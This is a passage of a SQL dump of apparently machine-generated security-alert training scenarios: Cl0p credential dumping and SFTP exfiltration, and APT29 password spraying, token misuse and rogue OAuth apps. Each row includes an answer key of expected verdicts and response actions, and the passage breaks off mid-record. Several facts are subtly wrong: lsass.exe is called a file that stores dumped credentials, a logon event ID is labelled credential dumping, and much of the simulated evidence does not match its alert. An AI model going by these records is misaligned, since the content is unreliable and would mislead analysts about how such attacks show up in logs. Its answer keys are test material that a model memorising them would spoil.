(431, 'Credential Dumping in Progress', 'critical', 'Security Information and Event Management (SIEM)', 'With persistence established, Cl0p begins dumping credentials from memory, preparing to infiltrate additional systems within the network.', 'Lateral Movement', 'T1003 - Credential Dumping', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"event_id\":\"4624\",\"source_ip\":\"185.92.220.45\",\"destination_ip\":\"192.168.1.25\",\"username\":\"admin_user\",\"process_name\":\"lsass.exe\",\"dump_file\":\"C:\\\\Windows\\\\Temp\\\\dumplog.dmp\",\"hash\":\"ab56b4d92b40713acc5af89985d4b786\",\"event_type\":\"Credential Dumping\",\"message\":\"Credential dumping detected from memory using lsass.exe.\"}', '2026-01-04 04:38:04', '2026-02-16 21:29:52', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.92.220.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with Cl0p APT activities\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host targeted for credential dumping\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"suspicious\",\"details\":\"High privilege user account targeted\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"lsass.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"System Logs\",\"verdict\":\"suspicious\",\"details\":\"File used for storing dumped credentials\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"ab56b4d92b40713acc5af89985d4b786\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with credential dumping 
tools\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Expert', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.037Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"185.92.220.45\\\",\\\"destination_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"admin_user\\\",\\\"process_name\\\":\\\"lsass.exe\\\",\\\"dump_file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\dumplog.dmp\\\",\\\"hash\\\":\\\"ab56b4d92b40713acc5af89985d4b786\\\",\\\"event_type\\\":\\\"Credential Dumping\\\",\\\"message\\\":\\\"Credential dumping detected from memory using lsass.exe.\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.037Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"185.92.220.45\\\",\\\"destination_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"admin_user\\\",\\\"process_name\\\":\\\"lsass.exe\\\",\\\"dump_file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\dumplog.dmp\\\",\\\"hash\\\":\\\"ab56b4d92b40713acc5af89985d4b786\\\",\\\"event_type\\\":\\\"Credential Dumping\\\",\\\"message\\\":\\\"Credential dumping detected from memory using lsass.exe.\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.037Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"185.92.220.45\\\",\\\"destination_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"admin_user\\\",\\\"process_name\\\":\\\"lsass.exe\\\",\\\"dump_file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\dumplog.dmp\\\",\\\"hash\\\":\\\"ab56b4d92b40713acc5af89985d4b786\\\",\\\"event_type\\\":\\\"Credential Dumping\\\",\\\"message\\\":\\\"Credential dumping detected from memory using lsass.exe.\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.037Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"185.92.220.45\\\",\\\"destination_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"admin_user\\\",\\\"process_name\\\":\\\"lsass.exe\\\",\\\"dump_file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\dumplog.dmp\\\",\\\"hash\\\":\\\"ab56b4d92b40713acc5af89985d4b786\\\",\\\"event_type\\\":\\\"Credential Dumping\\\",\\\"message\\\":\\\"Credential dumping detected from memory using lsass.exe.\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.037Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"185.92.220.45\\\",\\\"destination_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"admin_user\\\",\\\"process_name\\\":\\\"lsass.exe\\\",\\\"dump_file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\dumplog.dmp\\\",\\\"hash\\\":\\\"ab56b4d92b40713acc5af89985d4b786\\\",\\\"event_type\\\":\\\"Credential Dumping\\\",\\\"message\\\":\\\"Credential dumping detected from memory using lsass.exe.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" 
| head 100\"}}', 0),
(432, 'Data Exfiltration via Encrypted Channel', 'high', 'Network Traffic Analysis', 'In the final phase of the operation, Cl0p utilized encrypted channels to exfiltrate sensitive data from the network, leveraging legitimate file transfer protocols such as SFTP to avoid detection.', 'Exfiltration', 'T1048.003 - Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:30:00Z\",\"event\":\"Data Exfiltration\",\"source_ip\":\"10.0.0.15\",\"destination_ip\":\"185.100.87.200\",\"protocol\":\"SFTP\",\"file_name\":\"financial_report_2023.zip\",\"file_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"user\":\"jdoe\",\"encryption\":\"AES256\",\"bytes_transferred\":5242880,\"connection_duration\":360}', '2026-01-04 04:38:04', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"185.100.87.200\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Identified as a command-and-control server associated with Cl0p.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"financial_report_2023.zip\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"suspicious\",\"details\":\"Sensitive file potentially exfiltrated.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"File hash matches known stolen data set.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(433, 'Suspicious Login Attempts Detected', 'high', 'SIEM', 'Initial access is attempted through a series of password spraying attacks targeting cloud accounts of diplomatic personnel.', 'Password Spraying', 'T1110.003', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T08:45:23Z\",\"event_source\":\"cloud.service\",\"event_type\":\"login_attempt\",\"user\":\"diplomat_user\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"success\":false,\"attempt_count\":15,\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36\",\"attack_pattern\":\"Password Spraying\",\"associated_hash\":\"3b819b83b28c8d1d1d1e6d1d4f5f3f9f\",\"malicious\":true}', '2026-01-04 23:55:22', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT29 password spraying campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of targeted cloud account.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3b819b83b28c8d1d1d1e6d1d4f5f3f9f\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Platform\",\"verdict\":\"suspicious\",\"details\":\"Hash associated with unauthorized access attempts.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"diplomat_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Systems\",\"verdict\":\"clean\",\"details\":\"Valid diplomatic personnel cloud account.\"}}],\"recommended_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.041Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T08:45:23Z\\\",\\\"event_source\\\":\\\"cloud.service\\\",\\\"event_type\\\":\\\"login_attempt\\\",\\\"user\\\":\\\"diplomat_user\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"success\\\":false,\\\"attempt_count\\\":15,\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36\\\",\\\"attack_pattern\\\":\\\"Password Spraying\\\",\\\"associated_hash\\\":\\\"3b819b83b28c8d1d1d1e6d1d4f5f3f9f\\\",\\\"malicious\\\":true}\"},{\"timestamp\":\"2026-02-01T20:31:19.041Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T08:45:23Z\\\",\\\"event_source\\\":\\\"cloud.service\\\",\\\"event_type\\\":\\\"login_attempt\\\",\\\"user\\\":\\\"diplomat_user\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"success\\\":false,\\\"attempt_count\\\":15,\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36\\\",\\\"attack_pattern\\\":\\\"Password Spraying\\\",\\\"associated_hash\\\":\\\"3b819b83b28c8d1d1d1e6d1d4f5f3f9f\\\",\\\"malicious\\\":true}\"},{\"timestamp\":\"2026-02-01T20:30:19.041Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin 
from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T08:45:23Z\\\",\\\"event_source\\\":\\\"cloud.service\\\",\\\"event_type\\\":\\\"login_attempt\\\",\\\"user\\\":\\\"diplomat_user\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"success\\\":false,\\\"attempt_count\\\":15,\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36\\\",\\\"attack_pattern\\\":\\\"Password Spraying\\\",\\\"associated_hash\\\":\\\"3b819b83b28c8d1d1d1e6d1d4f5f3f9f\\\",\\\"malicious\\\":true}\"},{\"timestamp\":\"2026-02-01T20:29:19.041Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T08:45:23Z\\\",\\\"event_source\\\":\\\"cloud.service\\\",\\\"event_type\\\":\\\"login_attempt\\\",\\\"user\\\":\\\"diplomat_user\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"success\\\":false,\\\"attempt_count\\\":15,\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36\\\",\\\"attack_pattern\\\":\\\"Password Spraying\\\",\\\"associated_hash\\\":\\\"3b819b83b28c8d1d1d1e6d1d4f5f3f9f\\\",\\\"malicious\\\":true}\"},{\"timestamp\":\"2026-02-01T20:28:19.041Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T08:45:23Z\\\",\\\"event_source\\\":\\\"cloud.service\\\",\\\"event_type\\\":\\\"login_attempt\\\",\\\"user\\\":\\\"diplomat_user\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"success\\\":false,\\\"attempt_count\\\":15,\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36\\\",\\\"attack_pattern\\\":\\\"Password Spraying\\\",\\\"associated_hash\\\":\\\"3b819b83b28c8d1d1d1e6d1d4f5f3f9f\\\",\\\"malicious\\\":true}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(434, 'Unusual Token Usage Pattern', 'high', 'Cloud Access Security Broker (CASB)', 'Anomalous token usage detected following a successful password spraying attack. Stolen tokens were used to bypass MFA, indicating potential privilege escalation attempts.', 'Token Theft', 'T1078 - Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:00Z\",\"event_source\":\"CASB\",\"event_type\":\"Token Usage\",\"user\":\"jdoe@corporate.com\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.1.10.5\",\"token_id\":\"f47ac10b-58cc-4372-a567-0e02b2c3d479\",\"file_accessed\":\"/secure/finance_reports/q3_2023.pdf\",\"token_status\":\"anomalous\",\"related_hash\":\"e99a18c428cb38d5f260853678922e03\",\"context\":\"Token used to access privileged resources without MFA verification\"}', '2026-01-04 23:55:22', '2026-02-14 17:06:55', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT29 activities.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"jdoe@corporate.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"internal\",\"details\":\"Employee account used in suspicious activity.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"suspicious\",\"details\":\"Hash associated with anomalous token usage tools.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'SIEM', 1, 0, NULL, NULL, NULL, 
'{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.042Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"event_source\\\":\\\"CASB\\\",\\\"event_type\\\":\\\"Token Usage\\\",\\\"user\\\":\\\"jdoe@corporate.com\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.1.10.5\\\",\\\"token_id\\\":\\\"f47ac10b-58cc-4372-a567-0e02b2c3d479\\\",\\\"file_accessed\\\":\\\"/secure/finance_reports/q3_2023.pdf\\\",\\\"token_status\\\":\\\"anomalous\\\",\\\"related_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"context\\\":\\\"Token used to access privileged resources without MFA verification\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.042Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"event_source\\\":\\\"CASB\\\",\\\"event_type\\\":\\\"Token Usage\\\",\\\"user\\\":\\\"jdoe@corporate.com\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.1.10.5\\\",\\\"token_id\\\":\\\"f47ac10b-58cc-4372-a567-0e02b2c3d479\\\",\\\"file_accessed\\\":\\\"/secure/finance_reports/q3_2023.pdf\\\",\\\"token_status\\\":\\\"anomalous\\\",\\\"related_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"context\\\":\\\"Token used to access privileged resources without MFA verification\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.042Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"event_source\\\":\\\"CASB\\\",\\\"event_type\\\":\\\"Token 
Usage\\\",\\\"user\\\":\\\"jdoe@corporate.com\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.1.10.5\\\",\\\"token_id\\\":\\\"f47ac10b-58cc-4372-a567-0e02b2c3d479\\\",\\\"file_accessed\\\":\\\"/secure/finance_reports/q3_2023.pdf\\\",\\\"token_status\\\":\\\"anomalous\\\",\\\"related_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"context\\\":\\\"Token used to access privileged resources without MFA verification\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.042Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"event_source\\\":\\\"CASB\\\",\\\"event_type\\\":\\\"Token Usage\\\",\\\"user\\\":\\\"jdoe@corporate.com\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.1.10.5\\\",\\\"token_id\\\":\\\"f47ac10b-58cc-4372-a567-0e02b2c3d479\\\",\\\"file_accessed\\\":\\\"/secure/finance_reports/q3_2023.pdf\\\",\\\"token_status\\\":\\\"anomalous\\\",\\\"related_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"context\\\":\\\"Token used to access privileged resources without MFA verification\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.042Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"event_source\\\":\\\"CASB\\\",\\\"event_type\\\":\\\"Token Usage\\\",\\\"user\\\":\\\"jdoe@corporate.com\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.1.10.5\\\",\\\"token_id\\\":\\\"f47ac10b-58cc-4372-a567-0e02b2c3d479\\\",\\\"file_accessed\\\":\\\"/secure/finance_reports/q3_2023.pdf\\\",\\\"token_status\\\":\\\"anomalous\\\",\\\"related_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"context\\\":\\\"Token used to access privileged resources without MFA 
verification\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(435, 'Creation of Unauthorized OAuth Applications', 'high', 'Cloud Application Logs', 'An unauthorized OAuth application was created, indicating potential abuse for persistent access to cloud email systems.', 'OAuth Abuse', 'T1550.001 - OAuth Abuse', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"event_id\":\"oauth-creation-5678\",\"action\":\"create_oauth_app\",\"user\":\"compromised_user@example.com\",\"application_name\":\"RogueApp\",\"application_id\":\"app-123456789\",\"client_id\":\"client-98765\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.10\",\"indicators\":{\"malicious_ip\":\"203.0.113.45\",\"username\":\"compromised_user@example.com\"}}', '2026-01-04 23:55:22', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known OAuth abuse campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"compromised_user@example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Security Logs\",\"verdict\":\"suspicious\",\"details\":\"User credentials likely compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.044Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 
ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":\\\"oauth-creation-5678\\\",\\\"action\\\":\\\"create_oauth_app\\\",\\\"user\\\":\\\"compromised_user@example.com\\\",\\\"application_name\\\":\\\"RogueApp\\\",\\\"application_id\\\":\\\"app-123456789\\\",\\\"client_id\\\":\\\"client-98765\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"indicators\\\":{\\\"malicious_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"compromised_user@example.com\\\"}}\"},{\"timestamp\":\"2026-02-01T20:31:19.044Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":\\\"oauth-creation-5678\\\",\\\"action\\\":\\\"create_oauth_app\\\",\\\"user\\\":\\\"compromised_user@example.com\\\",\\\"application_name\\\":\\\"RogueApp\\\",\\\"application_id\\\":\\\"app-123456789\\\",\\\"client_id\\\":\\\"client-98765\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"indicators\\\":{\\\"malicious_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"compromised_user@example.com\\\"}}\"},{\"timestamp\":\"2026-02-01T20:30:19.044Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":\\\"oauth-creation-5678\\\",\\\"action\\\":\\\"create_oauth_app\\\",\\\"user\\\":\\\"compromised_user@example.com\\\",\\\"application_name\\\":\\\"RogueApp\\\",\\\"application_id\\\":\\\"app-123456789\\\",\\\"client_id\\\":\\\"client-98765\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"indicators\\\":{\\\"malicious_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"compromised_user@example.com\\\"}}\"},{\"timestamp\":\"2026-02-01T20:29:19.044Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":\\\"oauth-creation-5678\\\",\\\"action\\\":\\\"create_oauth_app\\\",\\\"user\\\":\\\"compromised_user@example.com\\\",\\\"application_name\\\":\\\"RogueApp\\\",\\\"application_id\\\":\\\"app-123456789\\\",\\\"client_id\\\":\\\"client-98765\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"indicators\\\":{\\\"malicious_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"compromised_user@example.com\\\"}}\"},{\"timestamp\":\"2026-02-01T20:28:19.044Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
